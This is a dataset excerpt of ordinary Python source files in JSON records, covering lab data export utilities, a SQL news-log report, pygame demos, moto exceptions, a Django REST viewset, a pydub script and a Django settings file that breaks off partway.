[{names}] to [{file_path}]')\n\n\ndef save_to_txt(datas, names, file_path):\n file_path = _save_to_checks(datas, names, file_path, fp_ext='.txt')\n for data, name in zip(datas, names):\n path, ext = os.path.splitext(file_path)\n fp = path + f'_{slugify(name)}' + ext # slugify ensures filesafe name\n np.savetxt(fp, data)\n logger.info(f'saved [{name}] to [{fp}]')\n\n\ndef fig_to_igor_itx(f: go.Figure, filepath: str):\n d = data_from_plotly_fig(f)\n waves = []\n for k in d:\n if not k.endswith('_x') and not k.endswith('_y'):\n wave = IgorWave(d[k], name=k)\n y_units = f.layout.yaxis.title.text\n y_units = y_units if y_units else 'not set'\n wave.set_datascale(y_units)\n for dim in ['x', 'y']:\n if f'{k}_{dim}' in d:\n dim_arr = d[f'{k}_{dim}']\n x_units = f.layout.xaxis.title.text\n x_units = x_units if x_units else 'not set'\n wave.set_dimscale('x', dim_arr[0], np.mean(np.diff(dim_arr)), units=x_units)\n waves.append(wave)\n with open(filepath, 'w') as fp:\n for wave in waves:\n wave.save_itx(fp, image=True) # Image = True hopefully makes np and igor match in x/y\n\n\ndef power_spectrum(data, meas_freq, normalization=1):\n \"\"\"\n Computes power spectrum and returns (freq, power spec)\n Args:\n data (): 1D data to calculate spectrum for\n meas_freq (): Frequency of measurement (not sample rate)\n normalization (): Multiplies data before calculating\n\n Returns:\n\n \"\"\"\n freq, power = scipy.signal.periodogram(data * normalization, fs=meas_freq)\n return freq, power\n\n\ndef dac_step_freq(x_array=None, freq=None, dat=None):\n if dat:\n assert all([x_array is None, freq is None])\n x_array = dat.Data.x_array\n freq = dat.Logs.Fastdac.measure_freq\n\n full_x = abs(x_array[-1] - x_array[0])\n num_x = len(x_array)\n min_step = 20000 / 2 ** 16\n req_step = full_x / num_x\n step_every = min_step / req_step\n step_t = step_every / freq\n step_hz = 1 / step_t\n return step_hz\n\n\n@dataclass\nclass IgorSaveInfo:\n x: np.ndarray\n data: np.ndarray\n name: str\n x_label: str\n y_label: str\n y: Optional[np.ndarray] = None\n\n\ndef save_multiple_save_info_to_itx(file_path: str, save_infos: List[IgorSaveInfo]):\n \"\"\"\n Save multiple save infos to a single .itx file\n Args:\n file_path ():\n save_infos ():\n\n Returns:\n\n \"\"\"\n save_to_igor_itx(file_path=file_path,\n xs=[s.x for s in save_infos],\n ys=[s.y for s in save_infos],\n datas=[s.data for s in save_infos],\n names=[s.name for s in save_infos],\n x_labels=[s.x_label for s in save_infos],\n y_labels=[s.y_label for s in save_infos],\n )\n\n\ndef save_to_igor_itx(file_path: str, xs: List[np.ndarray], datas: List[np.ndarray], names: List[str],\n ys: Optional[List[np.ndarray]] = None,\n x_labels: Optional[Union[str, List[str]]] = None,\n y_labels: Optional[Union[str, List[str]]] = None):\n \"\"\"Save data to a .itx file which can be dropped into Igor\"\"\"\n\n def check_axis_linear(arr: np.ndarray, axis: str, name: str, current_waves: list) -> bool:\n if arr.shape[-1] > 1 and not np.all(np.isclose(np.diff(arr), np.diff(arr)[0])):\n logger.warning(f\"{file_path}: Igor doesn't support a non-linear {axis}-axis. Saving as separate wave\")\n axis_wave = IgorWave(arr, name=name + f'_{axis}')\n current_waves.append(axis_wave)\n return False\n else:\n return True\n\n if x_labels is None or isinstance(x_labels, str):\n x_labels = [x_labels] * len(datas)\n if y_labels is None or isinstance(y_labels, str):\n y_labels = [y_labels] * len(datas)\n if ys is None:\n ys = [None] * len(datas)\n assert all([len(datas) == len(list_) for list_ in [xs, names, x_labels, y_labels]])\n\n waves = []\n for x, y, data, name, x_label, y_label in zip(xs, ys, datas, names, x_labels, y_labels):\n wave = IgorWave(data, name=name)\n if x is not None:\n if check_axis_linear(x, 'x', name, waves):\n wave.set_dimscale('x', x[0], np.mean(np.diff(x)), units=x_label)\n if y is not None:\n if check_axis_linear(y, 'y', name, waves):\n wave.set_dimscale('y', y[0], np.mean(np.diff(y)), units=y_label)\n elif y_label is not None:\n wave.set_datascale(y_label)\n waves.append(wave)\n\n with open(file_path, 'w') as fp:\n for wave in waves:\n wave.save_itx(fp, image=True) # Image = True hopefully makes np and igor match in x/y\n\n\ndef data_from_plotly_fig(f: go.Figure) -> Dict[str, np.ndarray]:\n all_data = {}\n for i, d in enumerate(f.data):\n name = getattr(d, 'name', None)\n if name is None:\n name = f'data{i}'\n elif name in all_data.keys():\n name = name + f'_{i}'\n if 'z' in d: # Then it is 2D\n all_data[name] = getattr(d, 'z')\n all_data[name + '_y'] = getattr(d, 'y')\n else:\n all_data[name] = getattr(d, 'y')\n all_data[name + '_x'] = getattr(d, 'x')\n return all_data\n\n\ndef data_from_json(filepath: str) -> Dict[str, np.ndarray]:\n with open(filepath, 'r') as f:\n s = f.read()\n js = json.loads(s)\n for k in js:\n js[k] = np.array(js[k], dtype=np.float32)\n return js\n\n\ndef fig_from_json(filepath: str) -> go.Figure:\n with open(filepath, 'r') as f:\n s = f.read()\n fig = go.Figure(json.loads(s))\n return fig\n\n\ndef fig_to_data_json(fig: go.Figure, filepath: str) -> bool:\n \"\"\"Saves all data in figure to json file\"\"\"\n data = data_from_plotly_fig(fig)\n filepath = filepath if os.path.splitext(filepath)[-1] == '.json' else f'{filepath}.json'\n return data_dict_to_json(data, filepath)\n\n\ndef data_dict_to_json(data_dict: dict, filepath: str) -> bool:\n \"\"\"Saves dict of arrays to json\"\"\"\n with open(filepath, 'w+') as f:\n json.dump(data_dict, f, default=lambda arr: arr.tolist())\n return True\n\n\ndef data_to_json(datas: List[np.ndarray], names: List[str], filepath: str) -> dict:\n \"\"\"\n Saves list of data arrays to a json file with names.\n Args:\n datas ():\n names ():\n filepath ():\n\n Returns:\n dict: Dict of data that was saved to json file\n\n \"\"\"\n data_dict = {name: data for name, data in zip(names, datas)}\n data_dict_to_json(data_dict, filepath)\n return data_dict\n\n\n@deprecated(deprecated_in='3.0.0', details='no longer using those dats')\ndef reset_dats(*args: Union[list, int, None], experiment_name: Optional[str] = None):\n \"\"\"Fully overwrites DatHDF of any datnums/lists of datnums passed in\"\"\"\n from .dat_object.make_dat import get_dat\n if reset_dats:\n all_datnums = []\n for datnums in args:\n if isinstance(datnums, list):\n all_datnums.extend(datnums)\n elif isinstance(datnums, (int, np.int32)):\n all_datnums.append(datnums)\n for datnum in all_datnums:\n get_dat(datnum, overwrite=True, exp2hdf=experiment_name)\n\n\n\n", "sub_path": "src/dat_analysis/useful_functions.py", "file_name": "useful_functions.py", "file_ext": "py", "file_size_in_byte": 9616, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "logging.getLogger", "line_number": 17, "usage_type": "call"}, {"api_name": "typing.Union", "line_number": 24, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 24, "usage_type": "attribute"}, {"api_name": "typing.List", "line_number": 24, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 24, "usage_type": "name"}, {"api_name": "logging.getLogger", "line_number": 30, "usage_type": "call"}, {"api_name": "logging.StreamHandler", "line_number": 32, "usage_type": "call"}, {"api_name": "logging.Formatter", "line_number": 33, "usage_type": "call"}, {"api_name": "os.path.split", "line_number": 44, "usage_type": "call"}, {"api_name": "os.path", "line_number": 44, "usage_type": "attribute"}, {"api_name": "os.path.isdir", "line_number": 46, "usage_type": "call"}, {"api_name": "os.path", "line_number": 46, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 51, "usage_type": "call"}, {"api_name": "os.path", "line_number": 51, "usage_type": "attribute"}, {"api_name": "scipy.io.savemat", "line_number": 58, "usage_type": "call"}, {"api_name": "scipy.io", "line_number": 58, "usage_type": "name"}, {"api_name": "os.path.splitext", "line_number": 65, "usage_type": "call"}, {"api_name": "os.path", "line_number": 65, "usage_type": "attribute"}, {"api_name": "slugify.slugify", "line_number": 66, "usage_type": "call"}, {"api_name": "numpy.savetxt", "line_number": 67, "usage_type": "call"}, {"api_name": "plotly.graph_objs.Figure", "line_number": 71, "usage_type": "attribute"}, {"api_name": "plotly.graph_objs", "line_number": 71, "usage_type": "name"}, {"api_name": "igorwriter.IgorWave", "line_number": 76, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 85, "usage_type": "call"}, {"api_name": "numpy.diff", "line_number": 85, "usage_type": "call"}, {"api_name": "scipy.signal.signal.periodogram", "line_number": 103, "usage_type": "call"}, {"api_name": "scipy.signal.signal", "line_number": 103, "usage_type": "attribute"}, {"api_name": "scipy.signal", "line_number": 103, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 125, "usage_type": "attribute"}, {"api_name": "numpy.ndarray", "line_number": 126, "usage_type": "attribute"}, {"api_name": "typing.Optional", "line_number": 130, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 130, "usage_type": "attribute"}, {"api_name": "dataclasses.dataclass", "line_number": 123, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 133, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 153, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 153, "usage_type": "attribute"}, {"api_name": "typing.Optional", "line_number": 154, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 154, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 154, "usage_type": "attribute"}, {"api_name": "typing.Optional", "line_number": 155, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 155, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 155, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 156, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 156, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 156, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 159, "usage_type": "attribute"}, {"api_name": "numpy.all", "line_number": 160, "usage_type": "call"}, {"api_name": "numpy.isclose", "line_number": 160, "usage_type": "call"}, {"api_name": "numpy.diff", "line_number": 160, "usage_type": "call"}, {"api_name": "igorwriter.IgorWave", "line_number": 162, "usage_type": "call"}, {"api_name": "igorwriter.IgorWave", "line_number": 178, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 181, "usage_type": "call"}, {"api_name": "numpy.diff", "line_number": 181, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 184, "usage_type": "call"}, {"api_name": "numpy.diff", "line_number": 184, "usage_type": "call"}, {"api_name": "plotly.graph_objs.Figure", "line_number": 194, "usage_type": "attribute"}, {"api_name": "plotly.graph_objs", "line_number": 194, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 194, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 194, "usage_type": "attribute"}, {"api_name": "json.loads", "line_number": 214, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 216, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 216, "usage_type": "attribute"}, {"api_name": "typing.Dict", "line_number": 211, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 211, "usage_type": "attribute"}, {"api_name": "plotly.graph_objs.Figure", "line_number": 223, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 223, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 223, "usage_type": "call"}, {"api_name": "plotly.graph_objs.Figure", "line_number": 220, "usage_type": "attribute"}, {"api_name": "plotly.graph_objs", "line_number": 220, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Figure", "line_number": 227, "usage_type": "attribute"}, {"api_name": "plotly.graph_objs", "line_number": 227, "usage_type": "name"}, {"api_name": "os.path.splitext", "line_number": 230, "usage_type": "call"}, {"api_name": "os.path", "line_number": 230, "usage_type": "attribute"}, {"api_name": "json.dump", "line_number": 237, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 241, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 241, "usage_type": "attribute"}, {"api_name": "typing.Union", "line_number": 259, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 259, "usage_type": "name"}, {"api_name": "numpy.int32", "line_number": 267, "usage_type": "attribute"}, {"api_name": "dat_object.make_dat.get_dat", "line_number": 270, "usage_type": "call"}, {"api_name": "deprecation.deprecated", "line_number": 258, "usage_type": "call"}]} +{"seq_id": "414673238", "text": "#!/usr/bin/env python3\n\nimport psycopg2\n\nDBNAME = \"news\"\n\ndef connect(database_name=DBNAME):\n try:\n db = psycopg2.connect(\"dbname={}\".format(database_name))\n cursor = db.cursor()\n return db, cursor\n except:\n print(\"\")\n\ndef questionOne():\n '''Question 1.'''\n db = psycopg2.connect(database=DBNAME)\n c = db.cursor()\n c.execute(\"SELECT title, views FROM articles \\\n LEFT JOIN (SELECT path, count(*) AS views \\\n FROM log GROUP BY path) AS v \\\n ON path LIKE '%' || slug \\\n order by views desc limit 3;\")\n aList = c.fetchall()\n print(\"\\n\")\n print(\"The most popular three articles of all time\")\n for (x,y) in aList:\n print(\"%s - %d views\" % (x, y))\n db.close()\n\ndef questionTwo():\n '''Question 2.'''\n db = psycopg2.connect(database=DBNAME)\n c = db.cursor()\n c.execute(\"SELECT name, sum(views) AS sumOfViews FROM authors \\\n LEFT JOIN (SELECT title, author, views FROM articles \\\n LEFT JOIN (SELECT path, count(*) AS views FROM log GROUP BY path) AS v \\\n ON path LIKE '%' || slug) AS a \\\n ON authors.id = a.author GROUP BY authors.id;\")\n aList = c.fetchall()\n print(\"\\n\")\n print(\"The most popular article authors of all time\")\n for (x,y) in aList:\n print(\"%s - %d views\" % (x, y))\n db.close()\n\ndef questionThree():\n '''Question 3.'''\n db = psycopg2.connect(database=DBNAME)\n c = db.cursor()\n query = \"SELECT fail.d, (fail.num*100.0/total.num) AS percentage \\\n FROM (SELECT cast(time AS date) AS d, count(status) AS num FROM log \\\n where status not LIKE 200 || '%' GROUP BY d) AS fail \\\n JOIN (SELECT cast(time AS date) AS d, count(status) AS num FROM log \\\n GROUP BY d) AS total \\\n ON fail.d = total.d where (fail.num*100.0/total.num) > 1;\"\n c.execute(query)\n aList = c.fetchall()\n print(\"\\n\")\n print(\"Days did more than 1% of requests lead to errors\")\n for (x,y) in aList:\n print(\"%s - %.2f%% errors\" % (x, y))\n db.close()\n\ndef main():\n questionOne()\n questionTwo()\n questionThree()\n\nif __name__ == '__main__':\n main()\n", "sub_path": "news.py", "file_name": "news.py", "file_ext": "py", "file_size_in_byte": 2294, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "psycopg2.connect", "line_number": 9, "usage_type": "call"}, {"api_name": "psycopg2.connect", "line_number": 17, "usage_type": "call"}, {"api_name": "psycopg2.connect", "line_number": 33, "usage_type": "call"}, {"api_name": "psycopg2.connect", "line_number": 49, "usage_type": "call"}]} +{"seq_id": "649244621", "text": "import os\r\nimport pygame\r\nfrom PIL import Image\r\nimport time\r\nimport animations\r\nimport game_var\r\n\r\n# Variables\r\n\r\n\r\n\r\npygame.display.set_caption('Turtle Simulator')\r\npygame.display.set_icon(game_var.logo64x)\r\n\r\n################################################################\r\n# #\r\n# Animations and Cutscenes #\r\n# #\r\n################################################################\r\n\r\n# Startup Screen\r\n\r\n\r\n\r\ntime.sleep(1)\r\n\r\nskip_startup = False\r\nfor event in pygame.event.get():\r\n if event.type == pygame.KEYDOWN and event.key == pygame.K_LSHIFT:\r\n print('Startup sequence skipped!')\r\n skip_startup = True\r\n\r\npygame.init() \r\n\r\nanimations.startup_sequence(skip_startup)\r\n\r\n# Game Loop\r\n\r\nwhile game_var.running:\r\n \r\n # Check Game State\r\n\r\n GAME_STATE = game_var.game_state.split('.')\r\n\r\n if GAME_STATE[0] == 'homescreen':\r\n pygame.time.delay(20)\r\n animations.home_screen()\r\n pygame.display.update()\r\n if GAME_STATE[0] == 'play':\r\n None", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 1155, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "pygame.display.set_caption", "line_number": 12, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 12, "usage_type": "attribute"}, {"api_name": "pygame.display.set_icon", "line_number": 13, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 13, "usage_type": "attribute"}, {"api_name": "game_var.logo64x", "line_number": 13, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 25, "usage_type": "call"}, {"api_name": "pygame.event.get", "line_number": 28, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 28, "usage_type": "attribute"}, {"api_name": "pygame.KEYDOWN", "line_number": 29, "usage_type": "attribute"}, {"api_name": "pygame.K_LSHIFT", "line_number": 29, "usage_type": "attribute"}, {"api_name": "pygame.init", "line_number": 33, "usage_type": "call"}, {"api_name": "animations.startup_sequence", "line_number": 35, "usage_type": "call"}, {"api_name": "game_var.running", "line_number": 39, "usage_type": "attribute"}, {"api_name": "game_var.game_state.split", "line_number": 43, "usage_type": "call"}, {"api_name": "game_var.game_state", "line_number": 43, "usage_type": "attribute"}, {"api_name": "pygame.time.delay", "line_number": 46, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 46, "usage_type": "attribute"}, {"api_name": "animations.home_screen", "line_number": 47, "usage_type": "call"}, {"api_name": "pygame.display.update", "line_number": 48, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 48, "usage_type": "attribute"}]} +{"seq_id": "18487481", "text": "from __future__ import unicode_literals\nfrom moto.core.exceptions import JsonRESTError\n\n\nclass InvalidInputException(JsonRESTError):\n code = 400\n\n def __init__(self):\n super(InvalidInputException, self).__init__(\n \"InvalidInputException\",\n \"You provided a value that does not match the required pattern.\",\n )\n\n\nclass DuplicateOrganizationalUnitException(JsonRESTError):\n code = 400\n\n def __init__(self):\n super(DuplicateOrganizationalUnitException, self).__init__(\n \"DuplicateOrganizationalUnitException\",\n \"An OU with the same name already exists.\",\n )\n", "sub_path": "moto/organizations/exceptions.py", "file_name": "exceptions.py", "file_ext": "py", "file_size_in_byte": 638, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "moto.core.exceptions.JsonRESTError", "line_number": 5, "usage_type": "name"}, {"api_name": "moto.core.exceptions.JsonRESTError", "line_number": 15, "usage_type": "name"}]} +{"seq_id": "2262271", "text": "from rest_framework.mixins import CreateModelMixin, ListModelMixin\nfrom rest_framework.response import Response\nfrom rest_framework.status import HTTP_201_CREATED\nfrom rest_framework.viewsets import GenericViewSet\n\nfrom v1.decorators.nodes import is_signed_message\nfrom ..models.invalid_block import InvalidBlock\nfrom ..serializers.invalid_block import InvalidBlockSerializer, InvalidBlockSerializerCreate\n\n\nclass InvalidBlockViewSet(\n CreateModelMixin,\n ListModelMixin,\n GenericViewSet,\n):\n \"\"\"\n Invalid blocks\n\n ---\n list:\n description: List invalid blocks\n create:\n description: Create invalid block\n \"\"\"\n\n ordering_fields = '__all__'\n queryset = InvalidBlock.objects.all()\n serializer_class = InvalidBlockSerializer\n serializer_create_class = InvalidBlockSerializerCreate\n\n @is_signed_message\n def create(self, request, *args, **kwargs):\n serializer = self.serializer_create_class(\n data=request.data,\n context={'request': request}\n )\n serializer.is_valid(raise_exception=True)\n invalid_block = serializer.save()\n\n return Response(\n self.get_serializer(invalid_block).data,\n status=HTTP_201_CREATED\n )\n", "sub_path": "v1/invalid_blocks/views/invalid_block.py", "file_name": "invalid_block.py", "file_ext": "py", "file_size_in_byte": 1247, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "rest_framework.mixins.CreateModelMixin", "line_number": 12, "usage_type": "name"}, {"api_name": "rest_framework.mixins.ListModelMixin", "line_number": 13, "usage_type": "name"}, {"api_name": "rest_framework.viewsets.GenericViewSet", "line_number": 14, "usage_type": "name"}, {"api_name": "models.invalid_block.InvalidBlock.objects.all", "line_number": 27, "usage_type": "call"}, {"api_name": "models.invalid_block.InvalidBlock.objects", "line_number": 27, "usage_type": "attribute"}, {"api_name": "models.invalid_block.InvalidBlock", "line_number": 27, "usage_type": "name"}, {"api_name": "serializers.invalid_block.InvalidBlockSerializer", "line_number": 28, "usage_type": "name"}, {"api_name": "serializers.invalid_block.InvalidBlockSerializerCreate", "line_number": 29, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 40, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_201_CREATED", "line_number": 42, "usage_type": "name"}, {"api_name": "v1.decorators.nodes.is_signed_message", "line_number": 31, "usage_type": "name"}]} +{"seq_id": "198265102", "text": "import pygame\nimport math\n\nWINDOW_SIZE = WINDOW_WIDTH, WINDOW_HEIGHT = 800, 600\nFPS = 30\n\nr1 = [(-20, 10), 150]\nr2 = [((WINDOW_WIDTH - 200) // 2, (WINDOW_HEIGHT - 150) // 2), 80]\n\n\ndef intercect(c1, c2):\n l = math.hypot(c1[0][0]-c2[0][0], c1[0][1]-c2[0][1])\n if l > c1[1] + c2[1]:\n return False\n return True\n\n\ndef main():\n pygame.init()\n clock = pygame.time.Clock()\n screen = pygame.display.set_mode(WINDOW_SIZE)\n bg = pygame.Color('black')\n c1 = pygame.Color('red')\n c2 = pygame.Color('blue')\n c3 = pygame.Color('green')\n\n running = True\n while running:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n break\n if event.type == pygame.MOUSEMOTION:\n r1[0] = event.pos\n if not running:\n break\n\n # проверка пересечения\n pygame.display.set_caption(f'{intercect(r1, r2)}')\n\n screen.fill(bg)\n\n pygame.draw.circle(screen, c1, r1[0], r1[1], 2)\n pygame.draw.circle(screen, c2, r2[0], r2[1], 2)\n pygame.draw.line(screen, c3, r1[0], r2[0], 2)\n\n clock.tick(FPS)\n pygame.display.flip()\n pygame.display.quit()\n\n\nif __name__ == '__main__':\n main()\n", "sub_path": "Pygame/PyGame06-01.py", "file_name": "PyGame06-01.py", "file_ext": "py", "file_size_in_byte": 1283, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "math.hypot", "line_number": 12, "usage_type": "call"}, {"api_name": "pygame.init", "line_number": 19, "usage_type": "call"}, {"api_name": "pygame.time.Clock", "line_number": 20, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 20, "usage_type": "attribute"}, {"api_name": "pygame.display.set_mode", "line_number": 21, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 21, "usage_type": "attribute"}, {"api_name": "pygame.Color", "line_number": 22, "usage_type": "call"}, {"api_name": "pygame.Color", "line_number": 23, "usage_type": "call"}, {"api_name": "pygame.Color", "line_number": 24, "usage_type": "call"}, {"api_name": "pygame.Color", "line_number": 25, "usage_type": "call"}, {"api_name": "pygame.event.get", "line_number": 29, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 29, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 30, "usage_type": "attribute"}, {"api_name": "pygame.MOUSEMOTION", "line_number": 33, "usage_type": "attribute"}, {"api_name": "pygame.display.set_caption", "line_number": 39, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 39, "usage_type": "attribute"}, {"api_name": "pygame.draw.circle", "line_number": 43, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 43, "usage_type": "attribute"}, {"api_name": "pygame.draw.circle", "line_number": 44, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 44, "usage_type": "attribute"}, {"api_name": "pygame.draw.line", "line_number": 45, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 45, "usage_type": "attribute"}, {"api_name": "pygame.display.flip", "line_number": 48, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 48, "usage_type": "attribute"}, {"api_name": "pygame.display.quit", "line_number": 49, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 49, "usage_type": "attribute"}]} +{"seq_id": "212242801", "text": "import os\nimport random\nfrom pydub import AudioSegment\n\nsample = AudioSegment.from_file('20hzSinLoud.wav')\nnewSample = sample[:1]\n\nfor target in range(len(sample) // 20):\n gain = random.randint(-100, 100)\n adjustedTarget = sample[(target * 20):(target * 20 + 20)] + gain\n newSample = newSample + adjustedTarget\nsavedFile = 'randomlyAdjusted20hz.wav'\nnewSample.export(savedFile, format=\"wav\")\n", "sub_path": "fulltest/listeningExp2.py", "file_name": "listeningExp2.py", "file_ext": "py", "file_size_in_byte": 401, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "pydub.AudioSegment.from_file", "line_number": 5, "usage_type": "call"}, {"api_name": "pydub.AudioSegment", "line_number": 5, "usage_type": "name"}, {"api_name": "random.randint", "line_number": 9, "usage_type": "call"}]} +{"seq_id": "452048752", "text": "import os\nimport dj_database_url\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nPROJECT_ROOT = os.path.dirname(os.path.abspath(__file__))\n\n\n# Quick-start development settings - unsuitable for production\n# See https://docs.djangoproject.com/en/1.10/howto/deployment/checklist/\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = os.environ.get('SECRET_KEY', 'devkey')\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = os.environ.get('DEBUG', False) == 'true'\n\n# Application definition\n\nINSTALLED_APPS = [\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n # Disable Django's own staticfiles handling in favour of WhiteNoise, for\n # greater consistency between gunicorn and `./manage.py runserver`. See:\n # http://whitenoise.evans.io/en/stable/django.html#using-whitenoise-in-development\n 'whitenoise.runserver_nostatic',\n 'django.contrib.staticfiles',\n\n 'django_twilio',\n 'raven.contrib.django.raven_compat',\n\n 'ingress',\n 'egress',\n 'periods',\n]\n\nMIDDLEWARE = [\n 'raven.contrib.django.raven_compat.middleware.Sentry404CatchMiddleware',\n 'raven.contrib.django.raven_compat.middleware.SentryResponseErrorIdMiddleware', # noqa: E501\n 'django.middleware.security.SecurityMiddleware',\n 'whitenoise.middleware.WhiteNoiseMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.auth.middleware.SessionAuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n]\n\nROOT_URLCONF = 'ymrj.urls'\n\nTEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'DIRS': [\n os.path.join(PROJECT_ROOT, 'templates'),\n ],\n 'APP_DIRS': True,\n 'OPTIONS': {\n 'context_processors': [\n 'django.template.context_processors.debug',\n 'django.template.context_processors.request',\n 'django.contrib.auth.context_processors.auth',\n 'django.contrib.messages.context_processors.messages',\n ],\n 'debug': DEBUG,\n },\n },\n]\n\nWSGI_APPLICATION = 'ymrj.wsgi.application'\n\n\n# Database\n# https://docs.djangoproject.com/en/1.10/ref/settings/#databases\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),\n }\n}\n\nAUTH_PASSWORD_VALIDATORS = [\n {\n 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator', # noqa: E501\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator', # noqa: E501\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator', # noqa: E501\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator', # noqa: E501\n },\n]\n\n# Internationalization\n# https://docs.djangoproject.com/en/1.10/topics/i18n/\n\nLANGUAGE_CODE = 'en-us'\nTIME_ZONE = 'UTC'\nUSE_I18N = True\nUSE_L10N = True\nUSE_TZ = True\n\n# Update database configuration with $DATABASE_URL.\ndb_from_env = dj_database_url.config(conn_max_age=500)\nDATABASES['default'].update(db_from_env)\n\n# Honor the 'X-Forwarded-Proto' header for request.is_secure()\nSECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTO', 'https')\n\n# Allow all host headers\nALLOWED_HOSTS = os.environ.get('ALLOWED_HOSTS', '*').split(',')\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/1.10/howto/static-files/\n\nSTATIC_ROOT = os.path.join(PROJECT_ROOT, 'staticfiles')\nSTATIC_URL = '/static/'\n\n# Extra places for collectstatic to find static files.\nSTATICFILES_DIRS = [\n os.path.join(PROJECT_ROOT, 'static'),\n]\n\n# Simplified static file serving.\n# https://warehouse.python.org/project/whitenoise/\nSTATICFILES_STORAGE = 'whitenoise.storage.CompressedManifestStaticFilesStorage'\n\n# Celery\nCELERY_BROKER_URL = os.environ.get('CLOUDAMQP_URL', None)\n\n# Twilio\nTWILIO_MESSAGING_SERVICE_ID = os.environ.get('TWILIO_MESSAGING_SERVICE_ID')\nTWILIO_FROM_NUMBER = os.environ.get('TWILIO_FROM_NUMBER')\n\nTWILIO_ENABLED = bool(TWILIO_MESSAGING_SERVICE_ID or TWILIO_FROM_NUMBER)\nif not TWILIO_ENABLED:\n print('Twilio is disabled because there was no configuration for it')\n\n# Sentry\nRAVEN_CONFIG = {\n 'dsn': os.environ.get('SENTRY_DSN'),\n}\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': True,\n 'root': {\n 'level': 'WARNING',\n 'handlers': ['sentry'],\n },\n 'formatters': {\n 'verbose': {\n 'format': '%(levelname)s %(asctime)s %(module)s '\n '%(process)d %(thread)d %(message)s'\n },\n },\n 'handlers': {\n 'sentry': {\n 'level': 'ERROR',\n 'class': 